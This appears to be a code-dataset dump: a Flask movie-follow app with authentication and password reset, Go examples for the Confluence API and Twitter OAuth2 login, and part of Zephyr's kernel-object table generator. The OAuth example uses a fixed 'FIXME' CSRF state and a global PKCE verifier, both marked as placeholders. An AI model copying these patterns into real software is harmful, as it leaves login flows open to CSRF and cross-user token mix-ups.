searchQuery = lookupGenre('tv', genre, page, sort_by)
if request.method == 'GET':
if searchQuery == []:
error = 'Please refine your search query to be more specific'
else:
return render_template('search/genres.html', results=searchQuery, page=page, pageCount=pageCount, genre=genre, genrename=genrename, mediaType=mediaType, sort_by=sort_by)
flash(error, 'warning')
return redirect(url_for('index'))
# if user clicks the follow button
elif request.method == 'POST':
# get the movie id from the form and look it up in our api
id = request.form['movie_id']
# Insert follow into database and get error (if any)
error = insert_single_follow(id)
if error is not None:
# flash error message
flash(error, 'warning')
return render_template('search/genres.html', results=searchQuery, page=page, pageCount=pageCount, genre=genre, genrename=genrename, mediaType=mediaType)
@app.route('/profile/<int:id>', methods=('GET', 'POST'))
def profile(id):
# Get movies 'person' has been in
movies = lookupPersonMovies(id)
# Get profile object
profile = lookupPersonProfile(id)
# if get - then get api information and pass that to the template
if request.method == 'GET':
return render_template('search/profile.html', profile=profile, movies=movies, name=profile[0]['name'])
# This link is visited daily to make sure release dates are accurate
# And to send emails to users when movies are released
@ app.route('/schedule')
def schedule():
if request.method == 'GET':
update_release_dates()
check_db()
return render_template('search/schedule.html')
# Register route
@ app.route('/auth/register', methods=('GET', 'POST'))
def register():
# on post - retrieve info from our form
if request.method == 'POST':
username = request.form['username'].lower()
password = request.form['password']
confirm = request.form['confirm']
# pre-set error to None
error = None
# init regex
reg = "^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@$!%*?&-_])[A-Za-z\d@$!#%*?&-_]{6,20}$"
# Compile Regex
pat = re.compile(reg)
# Search Regex
mat = re.search(pat, password)
# parse input
if not username:
error = 'You must provide a username'
elif not password:
error = 'You must provide a password'
# make sure username doesn't already exist
if db.session.query(User).filter(User.username == username).count() > 0:
error = 'User {} is already registered'.format(username)
# make sure passwords match
elif password != confirm:
error = 'Passwords must match'
elif not mat:
error = 'Password must contain (one number / one uppercase / one lowercase / one special symbol (@$!%*#?&-_) / be between 6-20 characters'
# if no errors then insert user into database
if error is None:
# Create user object
insert_user = User(username, generate_password_hash(password), confirmed=False)
# Push it to the database
db.session.add(insert_user)
db.session.commit()
# Create a confirmation token
token = generate_confirmation_token(username)
# Create a confirmation url with that token
confirm_url = url_for('confirm_email', token=token, _external=True)
# Send the confirmation email
try:
send_confirmation_email(username, confirm_url)
except:
return redirect(url_for('error_404', error='SMTP Error. Please email [email protected].'))
# flash success message
# Create session
user = User.query.filter_by(username=username).first()
session.clear()
session['user_id'] = user.id
# redirect to home page
flash('Now Registered As: {}! Welcome. Please confirm your email.'.format(username), 'success')
return redirect(url_for('unconfirmed'))
# flash any errors
flash(error, 'warning')
# if get then render template
return render_template('auth/register.html')
# Login route
@ app.route('/auth/login', methods=('POST', 'GET'))
def login():
# If next exists - store it in a variable so the user will be forwarded to the page they were on previously
next = request.args.get('next')
if request.method == 'POST':
# On post - retrieve info from the form
username = request.form['username'].lower()
password = request.form['password']
error = None
# Check for user in database and pull their info if it exists
user = User.query.filter_by(username=username).first()
# If valid input and user exists - set session data
if user and check_password_hash(user.password, password) == True:
session.clear()
session['user_id'] = user.id
# If user has not confirmed their email
if user.confirmed == False:
flash('Please confirm your email', 'warning')
# Redirect to home page
if next == None:
return redirect(url_for('index'))
# Redirect to the movie they were trying to follow
else:
return redirect(url_for('details', id=next, mediaType='movie'))
# parse for errors and set error message accordingly
elif not user or user is None:
error = 'Invalid Username/Password Combination'
elif not username or not password:
error = 'You must fill in both fields'
else:
error = 'Invalid Username/Password Combination'
# flash error if there is one
flash(error, 'warning')
# If logged in
if g.user is not None:
return redirect(url_for('index'))
# Render login page
return render_template('auth/login.html')
# follows route to display users followed movies
@ app.route('/user/follows', methods=('GET', 'POST'))
# ensure user is logged in and that their email is confirmed
@ login_required
@ check_confirmed
def follows():
# grab user's follows from the database and arrange them in order by release date
if request.method == 'GET':
follows = db.session.query(Follows).filter(
Follows.user_id == session['user_id']).order_by(Follows.movie_date.desc()).all()
followList = []
# create a list of all users follows to display in the template
for i in range(len(follows)):
date_obj = datetime.strptime(follows[i].movie_date, '%Y-%m-%d')
release = date_obj.strftime('%B %d, %Y')
released = date_obj.date() <= datetime.now().date()
title = follows[i].movie_title
movie_id = follows[i].movie_id
movie_type = follows[i].movie_type
followList.append({
"name": title,
"id": movie_id,
"release": release,
"released": released,
"movie_type": movie_type
})
# render the template and fill it in with the retrieved info
return render_template('user/follows.html', follows=followList)
# if they choose to delete a follow - delete it from their follows
elif request.method == 'POST':
# get the movie id from the form (delete button value)
id = request.form['movie_id']
movie_type = request.form.get('movie_type')
# store their session id
user = g.user.id
# deletion query
delete_this = db.session.query(Follows).filter(
Follows.movie_id == id,
Follows.user_id == user,
Follows.movie_type == movie_type
).one()
# delete the entry and commit it
db.session.delete(delete_this)
db.session.commit()
# create an updated follows list
follows = db.session.query(Follows).filter(
Follows.user_id == session['user_id']).order_by(Follows.movie_date.desc()).all()
followList = []
for i in range(len(follows)):
date_obj = datetime.strptime(follows[i].movie_date, '%Y-%m-%d')
release = date_obj.strftime('%B %d, %Y')
released = date_obj.date() <= datetime.now().date()
title = follows[i].movie_title
movie_id = follows[i].movie_id
movie_type = follows[i].movie_type
followList.append({
"name": title,
"id": movie_id,
"release": release,
"released": released,
"movie_type": movie_type
})
# render the updated template after deletion
return render_template('user/follows.html', follows=followList)
# ----------------------- TODO -----------------------
#
@app.route('/user/settings', methods=('GET', 'POST'))
@login_required
def settings():
if request.method == 'GET':
return render_template('user/settings.html')
if request.method == 'POST':
session['adult'] = request.form['adult']
return render_template('user/settings.html')
# this will store the users id in a global variable accessible anywhere
@ app.before_request
def load_logged_in_user():
user_id = session.get('user_id')
if user_id is None:
g.user = None
else:
try:
user = User.query.filter_by(id=user_id).all()
g.user = user[0]
except Exception as e:
return redirect(url_for('error_404', error='Database error, please email admin @ [email protected]'))
# logout route
@ app.route('/logout')
def logout():
g.user = None
session.clear()
return redirect(url_for('index'))
# Function to make sure release dates are accurate
def update_release_dates():
# Get follows list from database
releases = db.session.query(Follows).all()
# Loop over each item
for release in releases:
# Store the movie's id
database_id = release.movie_id
# Store the current release date we have in the database
database_date = release.movie_date
# Get the updated release date information from the API
updated_info = lookupReleaseDate(database_id)
# If the database is different than the API data and not 'TBA'
if database_date != updated_info['digital']['small'] and updated_info['digital']['small'] != 'TBA':
# If the database date is also different than the theatre date
if database_date != updated_info['theatre']['small'] and updated_info['theatre']['small'] != 'TBA':
# Update the release date to the theatre date
release.movie_date = updated_info['theatre']['small']
# If the database date is not different than the theatre date or the theatre date is TBA
elif updated_info['digital']['small'] != 'TBA':
# Update the release date to the digital date
release.movie_date = updated_info['digital']['small']
# If the database date is the same as the digital date BUT different than the theatre date
elif database_date != updated_info['theatre']['small'] and updated_info['theatre']['small'] != 'TBA':
# Update the release date to the theatre date
release.movie_date = updated_info['theatre']['small']
db.session.commit()
# function to go over database and find any movie that releases on 'todays' date
def check_db():
# store todays date value
today = str(datetime.now().date())
# grab all releases from follows table that have a movie_date value that matches todays date
releases = db.session.query(Follows).filter(
Follows.movie_date == today).all()
# if none found do nothing
if releases is None or releases == []:
pass
# else send emails to users following a movie that releases today
else:
for release in releases:
# date format
date_obj = datetime.strptime(release.movie_date, '%Y-%m-%d')
release_date = date_obj.strftime('%B %d, %Y')
# get the users email for each release
to_email = User.query.filter_by(
id=release.user_id).first().username
# as well as the movie title
movie_title = release.movie_title
# Get the poster for the movie
movie = lookupById(release.movie_id)
movie_poster = movie[0]['cover']
# Get the first two cast members to put in the email
if type(movie[0]['cast']) is list:
movie_stars = movie[0]['cast'][0:2]
else:
movie_stars = 'Unknown'
if movie_poster != 'https://image.tmdb.org/t/p/w600_and_h900_bestv2None':
movie_poster_url = movie_poster
else:
movie_poster_url = 'http://www.riobeauty.co.uk/images/product_image_not_found.gif'
# send the email
try:
send_release_mail(to_email, release_date, movie_title, movie_poster_url, movie_stars)
# if a failure occurs - print an error
except:
print('Email Error')
# Forgot password route
@ app.route('/auth/forgot', methods=('GET', 'POST'))
def forgot():
if request.method == 'GET':
return render_template('auth/forgot.html')
if request.method == 'POST':
# Get username input
username = request.form['username'].lower()
# Query the database with said username
user = db.session.query(User).filter(User.username == username).first()
# If no matches found
if user is None or user is []:
error = 'User {} does not exist.'.format(username)
else:
# Create reset link
token = user.get_reset_token()
link = url_for('reset', token=token, _external=True)
# Try sending the reset email
try:
send_reset_mail(username, link)
flash('An email has been sent with instructions to reset your password.', 'success')
except Exception as e:
# Error redirect
return redirect(url_for('error_404', error=e))
return redirect(url_for('login'))
# Flash the error if there is one
flash(error, 'warning')
return render_template('auth/forgot.html')
@ app.route('/auth/reset/<token>', methods=('GET', 'POST'))
def reset(token):
# Verify the token
user = User.verify_reset_token(token)
if request.method == 'GET':
if user is None:
flash('That is an invalid or expired token', 'danger')
return redirect(url_for('forgot'))
else:
return render_template('auth/reset.html')
elif request.method == 'POST':
password = request.form['password']
confirm = request.form['confirm']
# pre-set error to None
error = None
# init regex
reg = "^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@$!%*#?&-_])[A-Za-z\d@$!#%*?&-_]{6,20}$"
# Compile Regex
pat = re.compile(reg)
# Search Regex
mat = re.search(pat, password)
if not password:
error = 'You must provide a password'
# make sure passwords match
elif password != confirm:
error = 'Passwords must match'
elif not mat:
error = 'Password must contain (one number / one uppercase / one lowercase / one special symbol (@$!%*#?&-_) / be between 6-20 characters'
# if no errors then insert user into database
if error is None:
hashed_password = generate_password_hash(password)
user.password = hashed_password
db.session.commit()
# flash success message
flash('Your Password Has Been Updated! Please Login.', 'success')
return redirect(url_for('login'))
# flash any errors
flash(error, 'warning')
# if get then render template
return render_template('auth/reset.html')
# Confirmation email page
@ app.route('/auth/confirm/<token>')
@ login_required
def confirm_email(token):
try:
email = confirm_token(token)
except:
flash('Confirmation link is invalid or expired.', 'danger')
user = db.session.query(User).filter(User.username == email).first()
if user.confirmed:
flash('Account already confirmed, please login.', 'success')
else:
user.confirmed = True
db.session.commit()
session.clear()
session['user_id'] = user.id
return redirect(url_for('index'))
# Resend confirmation email
@ app.route('/auth/resend')
@ login_required
def resend_confirmation():
token = generate_confirmation_token(g.user.username)
confirm_url = url_for('confirm_email', token=token, _external=True)
try:
send_confirmation_email(g.user.username, confirm_url)
except:
return redirect(url_for('error_404', error='SMTP Error. Please email [email protected].'))
flash('A new confirmation email has been sent.', 'success')
return redirect(url_for('unconfirmed'))
# Unconfirmed email pageCount
@ app.route('/auth/unconfirmed')
@ login_required
def unconfirmed():
if g.user.confirmed:
return redirect(url_for('index'))
return render_template('auth/unconfirmed.html')
# Email confirmation functions
@ app.route('/error/404')
def error_404():
error = request.args.get('error') or None
return render_template('error/404.html', error=error)
def insert_single_follow(movie_id):
movie = lookupById(movie_id)[0]
# set error to none
error = None
# Get release object and store it in a variable
release_obj = movie['release_obj']
# If no digital date
if release_obj['digital']['small'] == 'TBA':
date = release_obj['theatre']['small']
movie_type = 'theatrical'
# If no theatre date
elif release_obj['theatre']['small'] == 'TBA':
date = release_obj['digital']['small']
movie_type = 'digital'
# If both types available - follow the digital one
elif release_obj['digital']['small'] != 'TBA' and release_obj['theatre']['small'] != 'TBA':
date = release_obj['digital']['small']
movie_type = 'digital'
# If no types available - use the basic date provided
elif release_obj['digital']['small'] == 'TBA' and release_obj['theatre']['small'] == 'TBA':
date = movie['release_small']
movie_type = 'digital'
# check to make sure user is not already following
if db.session.query(Follows).filter(
Follows.user_id == session['user_id'],
Follows.movie_id == movie['id'],
Follows.movie_date == date,
Follows.movie_type == movie_type
).count() > 0:
# set error message appropriately
error = 'You are already following the {} release for {}!'.format(movie_type, movie['name'])
# if not following then insert the follow into the database
else:
insert_follow = Follows(
session['user_id'], movie['id'], movie['name'], date, movie_type)
db.session.add(insert_follow)
db.session.commit()
# flask success message and re-render template
flash('Now following {}!'.format(movie['name']), 'success')
return error
def insert_follows(movie_id, theatre=None, digital=None):
release_date = None
movie_type = None
release_date_list = None
error = None
err_count = 0
# Adding functionality to follow either theatre / digital release OR both
# Lookup movie in database
movie = lookupById(movie_id)[0]
# Get release info based on users input
# For BOTH types of releases
if theatre is not None and digital is not None:
release_obj = lookupReleaseDate(movie_id)
release_date_list = [
{
'type': 'digital',
'date': str(release_obj['digital']['small'])
},
{
'type': 'theatrical',
'date': str(release_obj['theatre']['small'])
}
]
# For digital releases only
elif digital == 'digital' and theatre is None:
release_date = lookupReleaseDate(movie_id)
release_date = str(release_date['digital']['small'])
movie_type = 'digital'
# For theatrical releases only
elif theatre == 'theatrical' and digital is None:
release_date = lookupReleaseDate(movie_id)
release_date = str(release_date['theatre']['small'])
movie_type = 'theatrical'
# For input with both release types
if release_date is None:
# For each release type
for i in range(len(release_date_list)):
# Check if user is already following this specific release and type
if db.session.query(Follows).filter(
Follows.user_id == g.user.id,
Follows.movie_id == movie['id'],
Follows.movie_date == release_date_list[i]['date'],
Follows.movie_type == release_date_list[i]['type']
).count() > 0:
err_count = err_count + 1
error = 'You are already following the {} release for {}'.format(release_date_list[i]['type'], movie['name'])
# If not -> insert into database
else:
insert_follow = Follows(
g.user.id, movie['id'], movie['name'], release_date_list[i]['date'], release_date_list[i]['type'])
db.session.add(insert_follow)
db.session.commit()
flash('Now following the {} release for {}!'.format(release_date_list[i]['type'], movie['name']), 'success')
if err_count == 2:
error = 'You are already following both release dates for {}'.format(movie['name'])
# For single release types
elif release_date is not None:
# Make sure the user is not following this release and type
if db.session.query(Follows).filter(
Follows.user_id == g.user.id,
Follows.movie_id == movie['id'],
Follows.movie_date == release_date,
Follows.movie_type == movie_type
).count() > 0:
error = 'You are already following the {} release for {}!'.format(movie_type, movie['name'])
# If not -> insert into database
else:
insert_follow = Follows(
g.user.id, movie['id'], movie['name'], release_date, movie_type)
db.session.add(insert_follow)
db.session.commit()
# success message and reload new follows page
flash('Now following the {} release for {}!'.format(movie_type, movie['name']), 'success')
return error
|
[] |
[] |
[
"DATABASE_URL"
] |
[]
|
["DATABASE_URL"]
|
python
| 1 | 0 | |
confluence/examples/childrenDescendant/childrenByType/childrenByType.go
|
package main
import (
"context"
"github.com/ctreminiom/go-atlassian/confluence"
"log"
"os"
)
func main() {
var (
host = os.Getenv("HOST")
mail = os.Getenv("MAIL")
token = os.Getenv("TOKEN")
)
instance, err := confluence.New(nil, host)
if err != nil {
log.Fatal(err)
}
instance.Auth.SetBasicAuth(mail, token)
instance.Auth.SetUserAgent("curl/7.54.0")
var (
contentID = "76513281"
contentType = "page"
expand = []string{"childTypes.all"}
parentVersion = 0
starAt = 0
maxResult = 50
)
contents, response, err := instance.Content.ChildrenDescendant.ChildrenByType(context.Background(), contentID, contentType,
parentVersion, expand, starAt, maxResult)
if err != nil {
if response != nil {
log.Println(response.API)
}
log.Fatal(err)
}
log.Println("Endpoint:", response.Endpoint)
log.Println("Status Code:", response.Code)
for _, content := range contents.Results {
log.Println(content.Type, content.Title, content.ID)
}
}
|
[
"\"HOST\"",
"\"MAIL\"",
"\"TOKEN\""
] |
[] |
[
"MAIL",
"HOST",
"TOKEN"
] |
[]
|
["MAIL", "HOST", "TOKEN"]
|
go
| 3 | 0 | |
main.go
|
package main
import (
"context"
"crypto/rand"
"crypto/sha256"
"encoding/base64"
"io"
"log"
"net/http"
"os"
"github.com/gorilla/mux"
"golang.org/x/oauth2"
)
// TODO: 本番では固定値ではなく、ブラウザごとに異なる値を生成して保存してください
// https://www.rfc-editor.org/rfc/rfc6749.html#section-10.12
// The binding value used for CSRF
// protection MUST contain a non-guessable value (as described in Section 10.10),
// and the user-agent's authenticated state (e.g., session cookie, HTML5 local storage) MUST be kept in a location
// accessible only to the client and the user-agent (i.e., protected by same-origin policy)
const state = "FIXME"
var (
config = oauth2.Config{
ClientID: os.Getenv("TWITTER_CLIENT_ID"),
ClientSecret: os.Getenv("TWITTER_CLIENT_SECRET"),
Endpoint: oauth2.Endpoint{
AuthURL: "https://twitter.com/i/oauth2/authorize",
TokenURL: "https://api.twitter.com/2/oauth2/token",
AuthStyle: oauth2.AuthStyleInHeader,
},
RedirectURL: "http://localhost:8080/callback",
Scopes: []string{"tweet.read", "users.read", "tweet.write"},
}
codeVerifier string
)
func main() {
r := mux.NewRouter()
r.HandleFunc("/login", loginHandler).Methods("GET")
r.HandleFunc("/callback", callbackHandler).Methods("GET")
srv := &http.Server{
Handler: r,
Addr: "127.0.0.1:8080",
}
log.Println("Click the following link to login: http://localhost:8080/login")
log.Fatal(srv.ListenAndServe())
}
func loginHandler(w http.ResponseWriter, r *http.Request) {
url := buildAuthorizationURL(config)
log.Println(url)
w.Header().Set("Location", url)
w.WriteHeader(http.StatusFound)
return
}
func buildAuthorizationURL(config oauth2.Config) string {
// PKCE 対応 https://datatracker.ietf.org/doc/html/rfc7636
// TODO: 本番ではブラウザごとのセッションに保存してください
codeVerifier = generateBase64Encoded32byteRandomString()
h := sha256.New()
h.Write([]byte(codeVerifier))
hashed := h.Sum(nil)
codeChallenge := base64.URLEncoding.WithPadding(base64.NoPadding).EncodeToString(hashed)
url := config.AuthCodeURL(
state,
oauth2.SetAuthURLParam("code_challenge", codeChallenge),
oauth2.SetAuthURLParam("code_challenge_method", "S256"))
return url
}
func callbackHandler(w http.ResponseWriter, r *http.Request) {
queryCode := r.URL.Query().Get("code")
if queryCode == "" {
log.Println("code not found")
w.WriteHeader(http.StatusBadRequest)
return
}
queryState := r.URL.Query().Get("state")
if queryState == "" {
log.Println("state not found")
w.WriteHeader(http.StatusBadRequest)
return
}
if queryState != state {
log.Println("invalid state")
w.WriteHeader(http.StatusBadRequest)
return
}
token, err := config.Exchange(context.Background(), queryCode, oauth2.SetAuthURLParam("code_verifier", codeVerifier))
if err != nil {
log.Printf("failed to exchange token: %v\n", err)
w.WriteHeader(http.StatusBadRequest)
return
}
log.Printf("token scope: %v\n", token.Extra("scope"))
oAuthClient := oauth2.NewClient(r.Context(), oauth2.StaticTokenSource(token))
// https://developer.twitter.com/en/docs/twitter-api/users/lookup/api-reference/get-users-me
res, err := oAuthClient.Get("https://api.twitter.com/2/users/me")
if err != nil {
log.Printf("failed to get me: %v\n", err)
w.WriteHeader(http.StatusInternalServerError)
return
}
defer res.Body.Close()
w.Header().Set("Content-Type", "application/json")
_, _ = io.Copy(w, res.Body)
}
func generateBase64Encoded32byteRandomString() string {
b := make([]byte, 32)
if _, err := io.ReadFull(rand.Reader, b); err != nil {
return ""
}
return base64.URLEncoding.WithPadding(base64.NoPadding).EncodeToString(b)
}
|
[
"\"TWITTER_CLIENT_ID\"",
"\"TWITTER_CLIENT_SECRET\""
] |
[] |
[
"TWITTER_CLIENT_SECRET",
"TWITTER_CLIENT_ID"
] |
[]
|
["TWITTER_CLIENT_SECRET", "TWITTER_CLIENT_ID"]
|
go
| 2 | 0 | |
scripts/gen_kobject_list.py
|
#!/usr/bin/env python3
#
# Copyright (c) 2017 Intel Corporation
#
# SPDX-License-Identifier: Apache-2.0
"""
Script to generate gperf tables of kernel object metadata
User mode threads making system calls reference kernel objects by memory
address, as the kernel/driver APIs in Zephyr are the same for both user
and supervisor contexts. It is necessary for the kernel to be able to
validate accesses to kernel objects to make the following assertions:
- That the memory address points to a kernel object
- The kernel object is of the expected type for the API being invoked
- The kernel object is of the expected initialization state
- The calling thread has sufficient permissions on the object
For more details see the :ref:`kernelobjects` section in the documentation.
The zephyr build generates an intermediate ELF binary, zephyr_prebuilt.elf,
which this script scans looking for kernel objects by examining the DWARF
debug information to look for instances of data structures that are considered
kernel objects. For device drivers, the API struct pointer populated at build
time is also examined to disambiguate between various device driver instances
since they are all 'struct device'.
This script can generate five different output files:
- A gperf script to generate the hash table mapping kernel object memory
addresses to kernel object metadata, used to track permissions,
object type, initialization state, and any object-specific data.
- A header file containing generated macros for validating driver instances
inside the system call handlers for the driver subsystem APIs.
- A code fragment included by kernel.h with one enum constant for
each kernel object type and each driver instance.
- The inner cases of a switch/case C statement, included by
kernel/userspace.c, mapping the kernel object types and driver
instances to their human-readable representation in the
otype_to_str() function.
- The inner cases of a switch/case C statement, included by
kernel/userspace.c, mapping kernel object types to their sizes.
This is used for allocating instances of them at runtime
(CONFIG_DYNAMIC_OBJECTS) in the obj_size_get() function.
"""
import sys
import argparse
import math
import os
import struct
import json
from distutils.version import LooseVersion
import elftools
from elftools.elf.elffile import ELFFile
from elftools.elf.sections import SymbolTableSection
if LooseVersion(elftools.__version__) < LooseVersion('0.24'):
sys.exit("pyelftools is out of date, need version 0.24 or later")
from collections import OrderedDict
# Keys in this dictionary are structs which should be recognized as kernel
# objects. Values are a tuple:
#
# - The first item is None, or the name of a Kconfig that
# indicates the presence of this object's definition in case it is not
# available in all configurations.
#
# - The second item is a boolean indicating whether it is permissible for
# the object to be located in user-accessible memory.
# Regular dictionaries are ordered only with Python 3.6 and
# above. Good summary and pointers to official documents at:
# https://stackoverflow.com/questions/39980323/are-dictionaries-ordered-in-python-3-6
kobjects = OrderedDict([
("k_mem_slab", (None, False)),
("k_msgq", (None, False)),
("k_mutex", (None, False)),
("k_pipe", (None, False)),
("k_queue", (None, False)),
("k_poll_signal", (None, False)),
("k_sem", (None, False)),
("k_stack", (None, False)),
("k_thread", (None, False)),
("k_timer", (None, False)),
("z_thread_stack_element", (None, False)),
("device", (None, False)),
("sys_mutex", (None, True)),
("k_futex", (None, True))
])
def kobject_to_enum(kobj):
if kobj.startswith("k_") or kobj.startswith("z_"):
name = kobj[2:]
else:
name = kobj
return "K_OBJ_%s" % name.upper()
subsystems = [
# Editing the list is deprecated, add the __subsystem sentinal to your driver
# api declaration instead. e.x.
#
# __subsystem struct my_driver_api {
# ....
#};
]
def subsystem_to_enum(subsys):
return "K_OBJ_DRIVER_" + subsys[:-11].upper()
# --- debug stuff ---
scr = os.path.basename(sys.argv[0])
def debug(text):
if not args.verbose:
return
sys.stdout.write(scr + ": " + text + "\n")
def error(text):
sys.exit("%s ERROR: %s" % (scr, text))
def debug_die(die, text):
if 'DW_AT_decl_file' not in die.attributes:
abs_orig_val = die.attributes["DW_AT_abstract_origin"].value
offset = abs_orig_val + die.cu.cu_offset
for var in variables:
if var.offset == offset:
die = var
break
lp_header = die.dwarfinfo.line_program_for_CU(die.cu).header
files = lp_header["file_entry"]
includes = lp_header["include_directory"]
fileinfo = files[die.attributes["DW_AT_decl_file"].value - 1]
filename = fileinfo.name.decode("utf-8")
filedir = includes[fileinfo.dir_index - 1].decode("utf-8")
path = os.path.join(filedir, filename)
lineno = die.attributes["DW_AT_decl_line"].value
debug(str(die))
debug("File '%s', line %d:" % (path, lineno))
debug(" %s" % text)
# -- ELF processing
DW_OP_addr = 0x3
DW_OP_fbreg = 0x91
STACK_TYPE = "z_thread_stack_element"
thread_counter = 0
sys_mutex_counter = 0
futex_counter = 0
stack_counter = 0
# Global type environment. Populated by pass 1.
type_env = {}
extern_env = {}
variables = []
class KobjectInstance:
def __init__(self, type_obj, addr):
global thread_counter
global sys_mutex_counter
global futex_counter
global stack_counter
self.addr = addr
self.type_obj = type_obj
# Type name determined later since drivers needs to look at the
# API struct address
self.type_name = None
if self.type_obj.name == "k_thread":
# Assign an ID for this thread object, used to track its
# permissions to other kernel objects
self.data = thread_counter
thread_counter = thread_counter + 1
elif self.type_obj.name == "sys_mutex":
self.data = "&kernel_mutexes[%d]" % sys_mutex_counter
sys_mutex_counter += 1
elif self.type_obj.name == "k_futex":
self.data = "&futex_data[%d]" % futex_counter
futex_counter += 1
elif self.type_obj.name == STACK_TYPE:
stack_counter += 1
else:
self.data = 0
class KobjectType:
def __init__(self, offset, name, size, api=False):
self.name = name
self.size = size
self.offset = offset
self.api = api
def __repr__(self):
return "<kobject %s>" % self.name
@staticmethod
def has_kobject():
return True
def get_kobjects(self, addr):
return {addr: KobjectInstance(self, addr)}
class ArrayType:
def __init__(self, offset, elements, member_type):
self.elements = elements
self.member_type = member_type
self.offset = offset
def __repr__(self):
return "<array of %d>" % self.member_type
def has_kobject(self):
if self.member_type not in type_env:
return False
return type_env[self.member_type].has_kobject()
def get_kobjects(self, addr):
mt = type_env[self.member_type]
# Stacks are arrays of _k_stack_element_t but we want to treat
# the whole array as one kernel object (a thread stack)
# Data value gets set to size of entire region
if isinstance(mt, KobjectType) and mt.name == STACK_TYPE:
# An array of stacks appears as a multi-dimensional array.
# The last size is the size of each stack. We need to track
# each stack within the array, not as one huge stack object.
*dimensions, stacksize = self.elements
num_members = 1
for e in dimensions:
num_members = num_members * e
ret = {}
for i in range(num_members):
a = addr + (i * stacksize)
o = mt.get_kobjects(a)
o[a].data = stacksize
ret.update(o)
return ret
objs = {}
# Multidimensional array flattened out
num_members = 1
for e in self.elements:
num_members = num_members * e
for i in range(num_members):
objs.update(mt.get_kobjects(addr + (i * mt.size)))
return objs
class AggregateTypeMember:
def __init__(self, offset, member_name, member_type, member_offset):
self.member_name = member_name
self.member_type = member_type
if isinstance(member_offset, list):
# DWARF v2, location encoded as set of operations
# only "DW_OP_plus_uconst" with ULEB128 argument supported
if member_offset[0] == 0x23:
self.member_offset = member_offset[1] & 0x7f
for i in range(1, len(member_offset)-1):
if member_offset[i] & 0x80:
self.member_offset += (
member_offset[i+1] & 0x7f) << i*7
else:
raise Exception("not yet supported location operation (%s:%d:%d)" %
(self.member_name, self.member_type, member_offset[0]))
else:
self.member_offset = member_offset
def __repr__(self):
return "<member %s, type %d, offset %d>" % (
self.member_name, self.member_type, self.member_offset)
def has_kobject(self):
if self.member_type not in type_env:
return False
return type_env[self.member_type].has_kobject()
def get_kobjects(self, addr):
mt = type_env[self.member_type]
return mt.get_kobjects(addr + self.member_offset)
class ConstType:
def __init__(self, child_type):
self.child_type = child_type
def __repr__(self):
return "<const %d>" % self.child_type
def has_kobject(self):
if self.child_type not in type_env:
return False
return type_env[self.child_type].has_kobject()
def get_kobjects(self, addr):
return type_env[self.child_type].get_kobjects(addr)
class AggregateType:
def __init__(self, offset, name, size):
self.name = name
self.size = size
self.offset = offset
self.members = []
def add_member(self, member):
self.members.append(member)
def __repr__(self):
return "<struct %s, with %s>" % (self.name, self.members)
def has_kobject(self):
result = False
bad_members = []
for member in self.members:
if member.has_kobject():
result = True
else:
bad_members.append(member)
# Don't need to consider this again, just remove it
for bad_member in bad_members:
self.members.remove(bad_member)
return result
def get_kobjects(self, addr):
objs = {}
for member in self.members:
objs.update(member.get_kobjects(addr))
return objs
# --- helper functions for getting data from DIEs ---
def die_get_spec(die):
if 'DW_AT_specification' not in die.attributes:
return None
spec_val = die.attributes["DW_AT_specification"].value
# offset of the DW_TAG_variable for the extern declaration
offset = spec_val + die.cu.cu_offset
return extern_env.get(offset)
def die_get_name(die):
if 'DW_AT_name' not in die.attributes:
die = die_get_spec(die)
if not die:
return None
return die.attributes["DW_AT_name"].value.decode("utf-8")
def die_get_type_offset(die):
if 'DW_AT_type' not in die.attributes:
die = die_get_spec(die)
if not die:
return None
return die.attributes["DW_AT_type"].value + die.cu.cu_offset
def die_get_byte_size(die):
if 'DW_AT_byte_size' not in die.attributes:
return 0
return die.attributes["DW_AT_byte_size"].value
def analyze_die_struct(die):
name = die_get_name(die) or "<anon>"
offset = die.offset
size = die_get_byte_size(die)
# Incomplete type
if not size:
return
if name in kobjects:
type_env[offset] = KobjectType(offset, name, size)
elif name in subsystems:
type_env[offset] = KobjectType(offset, name, size, api=True)
else:
at = AggregateType(offset, name, size)
type_env[offset] = at
for child in die.iter_children():
if child.tag != "DW_TAG_member":
continue
data_member_location = child.attributes.get("DW_AT_data_member_location")
if not data_member_location:
continue
child_type = die_get_type_offset(child)
member_offset = data_member_location.value
cname = die_get_name(child) or "<anon>"
m = AggregateTypeMember(child.offset, cname, child_type,
member_offset)
at.add_member(m)
return
def analyze_die_const(die):
type_offset = die_get_type_offset(die)
if not type_offset:
return
type_env[die.offset] = ConstType(type_offset)
def analyze_die_array(die):
type_offset = die_get_type_offset(die)
elements = []
for child in die.iter_children():
if child.tag != "DW_TAG_subrange_type":
continue
if "DW_AT_upper_bound" not in child.attributes:
continue
ub = child.attributes["DW_AT_upper_bound"]
if not ub.form.startswith("DW_FORM_data"):
continue
elements.append(ub.value + 1)
if not elements:
if type_offset in type_env.keys():
mt = type_env[type_offset]
if mt.has_kobject():
if isinstance(mt, KobjectType) and mt.name == STACK_TYPE:
elements.append(1)
type_env[die.offset] = ArrayType(die.offset, elements, type_offset)
else:
type_env[die.offset] = ArrayType(die.offset, elements, type_offset)
def analyze_typedef(die):
type_offset = die_get_type_offset(die)
if type_offset not in type_env.keys():
return
type_env[die.offset] = type_env[type_offset]
def unpack_pointer(elf, data, offset):
endian_code = "<" if elf.little_endian else ">"
if elf.elfclass == 32:
size_code = "I"
size = 4
else:
size_code = "Q"
size = 8
return struct.unpack(endian_code + size_code,
data[offset:offset + size])[0]
def addr_deref(elf, addr):
for section in elf.iter_sections():
start = section['sh_addr']
end = start + section['sh_size']
if start <= addr < end:
data = section.data()
offset = addr - start
return unpack_pointer(elf, data, offset)
return 0
def device_get_api_addr(elf, addr):
# See include/device.h for a description of struct device
offset = 8 if elf.elfclass == 32 else 16
return addr_deref(elf, addr + offset)
def find_kobjects(elf, syms):
if not elf.has_dwarf_info():
sys.exit("ELF file has no DWARF information")
app_smem_start = syms["_app_smem_start"]
app_smem_end = syms["_app_smem_end"]
di = elf.get_dwarf_info()
# Step 1: collect all type information.
for CU in di.iter_CUs():
for die in CU.iter_DIEs():
# Unions are disregarded, kernel objects should never be union
# members since the memory is not dedicated to that object and
# could be something else
if die.tag == "DW_TAG_structure_type":
analyze_die_struct(die)
elif die.tag == "DW_TAG_const_type":
analyze_die_const(die)
elif die.tag == "DW_TAG_array_type":
analyze_die_array(die)
elif die.tag == "DW_TAG_typedef":
analyze_typedef(die)
elif die.tag == "DW_TAG_variable":
variables.append(die)
